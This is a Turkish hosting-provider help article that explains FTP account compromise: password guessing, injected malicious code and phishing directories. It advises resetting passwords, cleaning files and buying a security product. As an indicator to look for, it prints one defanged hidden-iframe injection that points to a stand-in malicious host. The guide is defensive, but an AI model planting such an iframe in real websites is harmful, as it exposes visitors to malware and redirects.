FTP gizlilik açığı nedir?

Dosyaları bilgisayarınız ile web siteniz arasında taşımak için Dosya Aktarım Protokolü’nü (FTP) kullanırsınız. Bilgisayarların gerçekleştirdiği çoğu işlemde olduğu gibi, bununla ilişkili bir parola vardır. Böylece yalnızca şifreyi paylaştığınız kişiler dosyalarınıza erişebilir.

Ancak saldırganlar basit şifreleri kolayca tahmin ederek web sitenizin dosyalarına erişebilir. Daha sonra sitenize kötü amaçlı kod ekleyerek ziyaretçilerinizin bilgisayarlarına zarar verebilirler. Örneğin onları başka sitelere yönlendirebilir veya kötü amaçlı yazılımlar yükleyebilirler.

FTP aracılığıyla hesabınızın gizliliği ihlal edildiyse bunu bilmenize yardımcı olacak bazı önemli işaretleri ve etkilenen dosyaları temizleyip daha fazla zararı önlemek için izleyebileceğiniz adımları belirledik.

FTP Gizlilik Açığını Belirleme

Aşağıdakiler de dahil olmak üzere (ancak bunlarla sınırlı olmayan) sitenizin saldırıya uğradığını gösteren birkaç işaret vardır:

  • Sitenize zararlı kod eklenmesi
  • Tuhaf adlara sahip yeni dizinler, bunlar özellikle banka veya sosyal medya sitelerinin adlarını kullanır
  • Tuhaf adlara sahip yeni dosyalar

Ancak her biri kendine özgü işaretlere sahip çok sayıda gizlilik açığı türü vardır.

Kötü Amaçlı Eklemeler

Saldırganlar şifrenizi ele geçirdikten sonra sitenize kötü amaçlı yazılımlar veya kimlik avı içeriği bulunduran kodlar yerleştirebilir. Genellikle web sitesinin kodunu incelerken bu eklemeleri dosyaların üstünde veya altında görebilirsiniz. Ayrıca, eklenen kod genellikle etkilenen dosyaların her birinde tekrarlanır. Bu, içeriği incelerken ilgili kodu hızlıca arayıp bulabileceğiniz anlamına gelir. İşte bir örnek:

iframename=Twitter scrolling=auto frameborder=no align=center height=5 width=1 ·src=hxxp://badsite.tld/badfile.php?id=someid/iframe>

Kimlik Avı İçeriği

Kimlik avı şemaları şifre, kredi kartı numarası ve sosyal güvenlik numarası gibi hassas kişisel bilgileri çalmayı hedefler. Genellikle, saldırgan geçerli bir web sitesi gibi görünen kimlik avı sitesine bağlantılar içeren bir istenmeyen e-posta gönderir. Bu site, kullanıcıları tuzağa düşürmeyi hedefler. Daha fazla bilgi için bkz. Kimlik Avı Nedir?

Sitenizi Koruma

Sitenizin bir saldırıya maruz kaldığını düşünüyorsanız yapabileceğiniz birkaç şey vardır.

Şifrenizi Sıfırlama

Sitenizde gizlilik ihlali olduğunu düşünüyorsanız yapmanız gereken ilk şey şifrenizi değiştirmektir. İlgili yönergeler için bkz. FTP kullanıcı adınızı ve şifrenizin sıfırlanması.

WordPress® gibi bir veritabanı kullanan web siteniz varsa veritabanınızın şifresini de değiştirmeniz gerekir. Bu bilgileri

adlı makalede bulabilirsiniz.

Hesabınızı Temizleme ve Geri Yükleme

Şifrenizi sıfırladıktan sonra tüm hosting içeriklerinizi incelemeli ve kötü amaçlı içerikleri kaldırmalısınız. Bunu kontrol panelinizin dosya yöneticisini (daha fazla bilgi) veya bir FTP istemcisi (daha fazla bilgi) kullanarak yapabilirsiniz.

Bunu yapmak istemiyorsanız (veya zamanınız yoksa) çoğu kötü amaçlı içeriği sizin için kaldıracak Website Security adlı bir güvenlik ürününden faydalanabilirsiniz. Web sitemizde bununla ilgili daha fazla ayrıntıya buradan ulaşabilirsiniz.

Çoğu müşteri için öneririz. Web Sitesi Güvenliği Üst Düzey planına erişim içerir. Buna tarama sırasında otomatik kötü amaçlı yazılım temizleme ve web sitenizi hızlandıran bir CDN dahildir.


Bu Makale Yardımcı Oldu mu?
Geri bildiriminiz için teşekkür ederiz. Müşteri hizmetleri temsilcisiyle görüşmek için lütfen destek telefon numarasını veya yukarıdaki sohbet seçeneğini kullanın.
Yardımcı olabildiysek ne mutlu bize! Sizin için yapabileceğimiz başka bir şey var mı?
Bunun için üzgünüz. Kafanızı neyin karıştırdığını veya çözümün problemi neden gidermediğini bize belirtin.